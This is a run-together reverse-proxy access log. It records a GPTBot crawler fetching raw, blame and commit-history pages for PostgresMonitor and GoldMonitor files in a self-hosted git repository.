git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 8598258] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:13:45:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 18351] [Gzip 11.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:13:45:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 22899] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:13:45:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 10185] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:13:45:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 9908] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:13:45:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 17181] [Gzip 9.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:13:45:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 1845] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/ReadMe.md" -[17/Feb/2026:13:45:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 1845] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/ReadMe.md" -[17/Feb/2026:13:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 12108] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor" -[17/Feb/2026:13:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 21223] [Gzip 10.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py" -[17/Feb/2026:13:45:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 4095] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py" -[17/Feb/2026:13:45:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 152] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:13:45:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 12512] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:13:45:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 12516] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:13:45:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 16948] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor0.py" -[17/Feb/2026:13:45:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 20089] [Gzip 6.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:13:45:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 9895] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/ReadMe.md" -[17/Feb/2026:13:45:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 12512] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:13:45:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 17278] [Gzip 8.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor-VeryGood2.py" -[17/Feb/2026:13:45:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 10373] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:13:45:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 949] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:13:45:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 12073] [Gzip 4.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:13:45:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 20089] [Gzip 6.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:13:45:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 9896] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.spec" -[17/Feb/2026:13:45:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 9902] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldSpotMonitor_Final.spec" -[17/Feb/2026:13:45:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 9864] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor0.py" -[17/Feb/2026:13:45:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 9899] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.py" -[17/Feb/2026:13:45:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 11733] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.spec" -[17/Feb/2026:13:45:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 11734] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.spec" -[17/Feb/2026:13:45:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 9893] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.spec" -[17/Feb/2026:13:45:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 11947] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/ReadMe.md" -[17/Feb/2026:13:45:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 12074] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:13:45:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 17388] [Gzip 8.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor0.py" -[17/Feb/2026:13:45:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 9896] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.py" -[17/Feb/2026:13:45:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 12481] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.spec" -[17/Feb/2026:13:45:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 12486] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldSpotMonitor_Final.spec" -[17/Feb/2026:13:45:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 20942] [Gzip 10.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.py" -[17/Feb/2026:13:45:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 20058] [Gzip 6.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.py" -[17/Feb/2026:13:45:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 9072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.py" -[17/Feb/2026:13:45:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 9072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.py" -[17/Feb/2026:13:46:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 20942] [Gzip 10.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.py" -[17/Feb/2026:13:46:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 1845] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/ReadMe.md" -[17/Feb/2026:13:46:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/ReadMe.txt?display=source" [Client 74.7.227.38] [Length 12089] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:13:46:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 10345] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:13:46:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 12042] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:13:46:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 11702] [Gzip 5.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.spec" -[17/Feb/2026:13:46:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 9876] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldSpotMonitor_Final.spec" -[17/Feb/2026:13:46:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.spec" [Client 74.7.227.38] [Length 9860] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.spec" -[17/Feb/2026:13:46:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 9862] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.py" -[17/Feb/2026:13:46:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 949] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:13:46:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 9858] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 